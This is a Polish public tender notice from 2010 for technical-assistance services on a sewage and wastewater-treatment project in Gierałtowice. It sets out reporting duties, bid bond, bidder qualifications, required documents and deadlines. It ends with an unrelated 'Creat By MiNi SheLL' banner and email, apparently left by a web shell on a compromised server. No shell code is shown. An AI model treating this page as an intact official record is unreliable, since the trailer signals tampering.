Sposób zatwierdzania raportu początkowego będzie taki, jak przyjęty dla raportów kwartalnych i opisany w podpunkcie (b) poniżej.
(b)	raporty kwartalne z wykonanych Usług wraz z wymaganymi dokumentami, o których mowa w p.5 powyżej; 
Każdy raport kwartalny zostanie przedłożony Zamawiającemu do zatwierdzenia w terminie 7 dni po zakończeniu kwartału kalendarzowego, i będzie zawierał w szczególności: krótki opis wykonanych Usług, liczbę dni pracy każdego Kluczowego Eksperta i innych ekspertów i personelu wspierającego Kluczowych Ekspertów wraz z krótkim opisem działań lub zadań, jakie wykonali, oraz spis sporządzonych przez Wykonawcę opinii, analiz i opracowań dołączonych do raportu.
Zamawiający w terminie 7 dni od otrzymania projektu raportu kwartalnego zatwierdzi go lub zgłosi uwagi. Raport kwartalny zostanie przedłożony Zamawiającemu w ostatecznej wersji nie później niż 7 dni po zatwierdzeniu lub zgłoszeniu uwag przez Zamawiającego do projektu tego raportu. Uwagi Zamawiającego muszą zostać uwzględnione w ostatecznej wersji raportu kwartalnego.
(c)	sprawozdania ad hoc, jeżeli zajdzie taka potrzeba lub na żądanie Zamawiającego;
(d)	Raport Końcowy z wykonania Usług Pomocy Technicznej w ramach Umowy, zawierający w szczególności:
-	krótki opis wykonanych Usług; 
-	krytyczną analizę napotkanych problemów technicznych, finansowych, prawnych i innych, oraz zastosowanych rozwiązań;
-	podsumowanie liczby dni pracy każdego Kluczowego Eksperta i innych ekspertów i personelu wspierającego Kluczowych Ekspertów z krótkim opisem działań lub zadań, jakie wykonali; 
-	opisanie działań najważniejszych z punktu widzenia celów określonych w Umowie (tzw milestones) w sposób opisany w Organizacji i metodyce; 
-	uzyskane wyniki; oraz
-	spis wszystkich sporządzonych przez Wykonawcę opinii, analiz i opracowań. 
Projekt Raportu Końcowego z wykonania Usług Pomocy Technicznej w ramach Umowy zostanie przedłożony Zamawiającemu na 28 dni przed planowanym zakończeniem świadczenia Usług przez Wykonawcę.
Zamawiający w terminie 14 dni od otrzymania projektu Raportu Końcowego z wykonania Usług Pomocy Technicznej w ramach Umowy zatwierdzi go lub zgłosi uwagi.
Raport Końcowy z wykonania Usług Pomocy Technicznej w ramach Umowy zostanie przedłożony Zamawiającemu w ostatecznej wersji nie później niż 14 dni po zatwierdzeniu lub zgłoszeniu uwag przez Zamawiającego do projektu tego Raportu. Uwagi Zamawiającego muszą zostać uwzględnione w ostatecznej wersji Raportu Końcowego z wykonania Usług Pomocy Technicznej w ramach Umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.62.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 9 000,00 zł (słownie złotych: dziewięć tysięcy 00:100) przed upływem terminu składania ofert na warunkach określonych w art. 45 i 46 ustawy Pzp. Wadium może być wniesione w pieniądzu przelewem na konto Zamawiającego, nr:           48845400012073003366040005 z informacją na przelewie - wadium przetargowe na: Pomoc techniczna dla Jednostki Realizującej Projekt w Przedsiębiorstwie Gospodarki Komunalnej Sp. z o. o. realizującego projekt pn.: Kanalizacja sanitarna wraz z oczyszczalnią ścieków w Gminie Gierałtowice - JRP/ZP-PNP/ZOP-U/07/2010.
Wadium w formie niepieniężnej należy złożyć w sekretariacie JRP zamawiającego Przedsiębiorstwa Gospodarki Komunalnej Sp. z o.o. ul. Karola Miarki 1, 44-178 Przyszowice w godz. 800 - 1400, uzyskując potwierdzenie złożenia na kserokopii dokumentów.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą brać udział wykonawcy nie wykluczeni z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy PZP, spełniający warunki art. 22 ust. 1 ustawy PZP, podpisane przez uprawnioną osobę - załącznik nr V do  SIWZ - IDW i załącznik nr VI do SIWZ -IDW, złożą ofertę zgodnie z wymaganiami Zamawiającego określonymi w treści SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia. W szczególności o zamówienie mogą ubiegać się Wykonawcy, którzy w okresie ostatnich trzech lat przed dniem upływu terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, lub wykonują:
- co najmniej jedną usługę której przedmiotem było prowadzenie stałego audytu wewnętrznego lub zewnętrznego projektu infrastrukturalnego z zakresu gospodarki wodno-ściekowej, którego wartość nie była mniejsza niż 40 000 000zł
- co najmniej jedną usługę której przedmiotem było świadczenie doradztwa w zakresie prowadzenia inwestycji w oparciu o warunki kontraktowe FIDIC (czerwony) dla projektu infrastrukturalnego z zakresu gospodarki wodno-ściekowej, którego wartość nie jest mniejsza niż 40 000 000 zł.
             Jako usługi dotyczące realizacji z ostatnich 3 lat przed upływem terminu składania ofert, Zamawiający uzna takie, które:
-	w przypadku zrealizowanych dotyczą usług jw., których realizacja miała miejsce nie wcześniej jak 3 lata przed upływem terminu składania ofert,
-	w przypadku realizowanych dotyczą usług jw., których realizacja zakończyła się do dnia upływu terminu składania ofert, a zrealizowany do tego czasu zakres finansowy projektu objętego świadczeniem usług jw. wyniósł 40 000 000 zł,  co winno wynikać z wykazu wykonanych lub wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie, zgodnie z wymaganiami jw., o treści załącznika nr III do siwz -IDW</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują, lub będą dysponować potencjałem technicznym niezbędnym dla prowadzenia usług, w szczególności: 
-	posiadać sprzęt komputerowy, telefony komórkowe, i sprzęt niezbędny do prowadzenia usług, w tym co najmniej 3 laptopy wraz z niezbędnym oprogramowaniem, 
co należy udokumentować poprzez przedstwienie w ofercie wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami o treści załącznika nr IV do siwz - IDW, z uwzględnieniem wymogu jw., wraz z informacją o podstawie dysponowania tymi zasobami
Warunek będzie spełniony jeżeli wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował wskazanymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować odpowiednio wykwalifikowanymi osobami w odpowiednich specjalnościach (Wykonawca nie może zaproponować tej samej osoby do pełnienia różnych funkcji):
a)	Kierownik Zespołu: Ekspert z zakresu zarządzania projektami, posiadający:
-  wykształcenie wyższe techniczne 
- 	co najmniej 3-letnie doświadczenie w zarządzaniu projektami infrastrukturalnymi;
-	doświadczenie w zarządzaniu co najmniej dwoma projektami o wartości nie mniejszej niż 40 000 000 PLN każdy, (zakończonymi na dzień składania ofert) infrastrukturalnym z zakresu gospodarki wodno-ściekowej na stanowisku kierowniczym (jako Kierownik Projektu, lub Kierownik zespołu zarządzającego);
- dobrą znajomość języka polskiego, w mowie i w piśmie, lub zapewnienie tłumacza.

b)	Ekspert finansowy, posiadający:
- 	wykształcenie wyższe ekonomiczne,
- 	co najmniej 5-letnie doświadczenie zawodowe w księgowości;
- 	kwalifikacje i doświadczenie w zarządzaniu finansowym, co najmniej jednym kontraktem lub projektem infrastrukturalnym.
-  uprawnienia biegłego rewidenta,
- dobrą znajomość języka polskiego, w mowie i w piśmie, lub zapewnienie tłumacza.

c)	Ekspert ds. audytu wewnętrznego i zewnętrznego posiadający:
- wykształcenie wyższe ekonomiczne
-  uprawnienia biegłego rewidenta,
- spełnienie wymagań o których mowa w art. 286 ustawy z dnia 27 sierpnia 2009 roku o finansach publicznych (Dz. U. z 2009 r. Nr 157 poz. 1240 z późn. zm.), posiadający uprawniania do wykonywania zawodowo funkcji audytora zewnętrznego)
- dobrą znajomość języka polskiego, w mowie i w piśmie, lub zapewnienie tłumacza, co winno wynikać z wykazu osób, które będą uczestniczyć w realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie pomocy technicznej,  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, wraz z oświadczeniem, że osoby, które będą uczestniczyły w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, z uwzględnieniem spełnienia wymogów jw., o treści załącznika nr II do siwz - IDW,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się Wykonawcy, którzy:
1. dysponują środkami finansowymi wystarczającymi do realizacji przedmiotu zamówienia, określonymi na sumę 100 000,00 zł, co winno wynikać z, informacji banku, lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy; wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, z uwzględnieniem wymogu jw.
 Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej 3 miesiące przed terminem składania ofert.

2. są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 300 000,00 zł co powinno wynikać z opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia, z uwzględnieniem wymogu jw. w pkt.2 (wraz z kserokopiami z potwierdzenia zapłaty składki o ile wpłata nie została potwierdzona w polisie lub w przypadku rozłożenia na raty - potwierdzenia wpłaty wszystkich dotychczas wymagalnych składek);  Wykonawca, który nie dysponuje polisą obejmującą pełny okres realizacji zamówienia, winien złożyć oświadczenie, iż zobowiązuje się do wznowienia polisy jw. na cały okres realizacji zamówienia przed wygaśnięciem posiadanej polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wycena ofertowa (ryczałtowa) - należy podać cenę ryczałtową za świadczenie pomocy technicznej dla Jednostki Realizującej Projekt w Przedsiębiorstwie Gospodarki Komunalnej Sp. z o. o  realizującego projekt pn.: Kanalizacja sanitarna wraz z oczyszczalnią ścieków w Gminie Gierałtowice współfinansowana z Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko, poprzez sporządzenie i wypełnienie harmonogramu rzeczowo - finansowego czynności w zakresie świadczenia pomocy technicznej, 
2)	Zaparafowany na dowód akceptacji przez osobę (osoby) upoważnioną do reprezentacji Wykonawcy projekt umowy.
3)	Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany do umowy możliwe są jedynie w trybie art. 144 ustawy Prawo zamówień publicznych. Uzgodnienia w tym zakresie wymagają dla swej ważności zatwierdzenia przez Zamawiającego, a zmiana umowy może nastąpić jedynie na piśmie w formie aneksu pod rygorem nieważności. Zamawiający dopuszcza możliwość zmiany umowy w następujących okolicznościach:
(a)	odmowy udzielenia dofinansowania Projektu w ramach Programu Operacyjnego Infrastruktura i Środowisko;
(b)	opóźnienia w wykonywaniu Usług z przyczyn niezależnych od Wykonawcy, skutkującego przedłużeniem czasu trwania Umowy;
(c)	zmiany osób uczestniczących w wykonywaniu Umowy wskazanych przez Wykonawcę w ofercie, jeżeli nastąpią z przyczyn niezależnych od Zamawiającego i Wykonawcy;
(d)	zmiany uwarunkowań prawnych lub administarcyjnych wykonywanej Umowy spowodowanych działaniami osób trzecich;
(e)	wystąpienia siły wyższej.
(f)   rezygnacji z wykonania części usług, z jednoczesnym ograniczeniem (obniżeniem) wynagrodzenia wykonawcy, wówczas zmiana umowy może nastąpić również w zakresie terminu i harmonogramu realizacji,

O ile zaistnieją przypadki, o których mowa w podpunktach (b), (c), (d) i (e), Zamawiający zastrzega sobie prawo odpowiedniego przedłużenia czasu trwania Umowy i/lub dostosowania/zmiany innych istotnych warunków Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgk-przyszowice.biuletyn.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego Przedsiębiorstwo Gospodarki Komunalnej Sp. z o. o.  ul. Karola Miarki 1, 44-178 Przyszowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2010 godzina 09:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego Przedsiębiorstwo Gospodarki Komunalnej Sp. z o. o.  ul. Karola Miarki 1, 44-178 Przyszowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest współfinansowane z Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com